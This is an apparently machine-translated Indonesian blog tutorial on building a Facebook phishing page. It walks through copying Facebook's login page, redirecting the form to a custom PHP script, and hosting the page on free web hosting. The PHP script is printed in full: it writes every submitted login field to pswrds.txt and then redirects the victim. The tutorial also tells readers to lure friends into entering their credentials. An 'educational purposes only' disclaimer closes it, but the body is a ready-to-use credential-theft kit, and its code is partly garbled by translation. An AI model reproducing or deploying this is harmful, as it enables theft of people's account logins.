Sebagian besar orang ingin tahu bagaimana hacker mengambil kendali dari rekening mereka.Dalam posting ini, izinkan saya mengklarifikasi keraguan. Di sini, saya akan menjelaskan salah satu serangan rekayasa sosial populer (memikat pengguna untuk melakukan apa pun yang Anda diminta untuk melakukan.), yang disebut "phishing ". Phishing adalah salah satu yang populerhacking yang teknik digunakan oleh hacker untuk memancing korban agar memberi login mereka. WebPage Phishing: . halaman web Phishing adalah halaman web palsu dari situs target yang membantu hacker untuk memancing korban ke dalam percaya bahwa mereka mengunjungi situs yang sah Mari saya jelaskan cara membuat facebook . Halaman phishing Langkah 1: Pergi ke facebook dan klik kanan di website. Pilih "Lihat sumber" dan salin kode ke notepad.

Step2:
Sekarang cari (Tekan ctrl + f) untuk kata kunci "action" dalam kode itu. Anda mengisi menemukan kode seperti ini:

Di sini, mari saya jelaskan apa "action" berarti. Jika Anda memiliki beberapa pengetahuan dasar tentang aplikasi web, maka Anda sudah tahu tentang itu. 'Aksi' adalah atribut HTML yang menentukan di mana untuk mengirim form-data ketika formulir dikirimkan. Pada kode diatas, atribut aksi memiliki nilai yang menunjuk ke file php facebook login (https://login.facebook.com / login.php). Jadi, ketika pengguna mengklik tombol login, maka akan mengirimkan data ke halaman login.php. File php ini akan memeriksa apakah password yang dimasukkan valid atau tidak. Untuk menangkap form-data, kita harus mengubah nilai tindakan ke file php kita. Jadi mari kita mengubah nilai untuk 'action = "login.php"'. Catatan: Aku telah menghapus 'http://login.facebook.com/' dari nilai. Simpan file sebagai index.html. Langkah 3: Sekarang, mari kita membuat file login.php kita sendiri yang akan menangkap data yang dimasukkan dan diarahkan ke halaman facebook asli. Buka notepad dan ketik kode berikut:

< ? php
header ("Location: http://www.Facebook.com/login.php");
$ menangani = fopen ("pswrds.txt", "a");
foreach ($ _ POST sebagai $ variable => $ value) {
fwrite ($ handle, $ variable);
fwrite ($ handle, "=");
fwrite ($ handle, $ value);
fwrite ($ handle, "\ r \ n");
}
fwrite ($ handle , "\ r \ n");
fclose ($ handle);
exit;
?>

simpan file ini sebagai "login.php"

Langkah 4:

Buka notepad dan hanya menyimpan file sebagai "pswrds.txt" (tanpa isi). Langkah 5: Untuk host halaman phishing Anda, Anda mungkin perlu sebuah webhosting. Anda dapat membuat account gratis di penyedia web hosting gratis . Setelah Anda membuat akun di situs hosting gratis, Anda dapat meng-host file Anda dan jalankan. Juga, file Anda dapat dilihat dengan mengunjungi URL tertentu yang diberikan ketika Anda membuat akun. Sebagai contoh:. 'Your_url_name.webhosting_domain.com' Sekarang upload file-file (index.html, login.php, pswrds.txt) di gratis  Web hosting situs . Pastikan halaman palsu Anda bekerja atau tidak dengan vising url Anda.  Sekarang, Anda harus memikat teman-teman Anda ke dalam masuk ke dalam halaman phishing Anda. Setelah mereka masuk ke dalam halaman, Anda dapat melihat login yang disimpan dalam "pswrds.txt" file. Catatan:

Artikel di atas adalah untuk tujuan pendidikan saja, ditulis untuk pemula dari Ethical hacking atau pentesting untuk memahami dasar-dasar sehingga akan mudah bagi mereka untuk memahami topik-topik lanjutan. Saya juga menulis sebuah artikel yang memberikan beberapa tips keamanan untuk melindungi diri dari menjadi korban semacam halaman phishing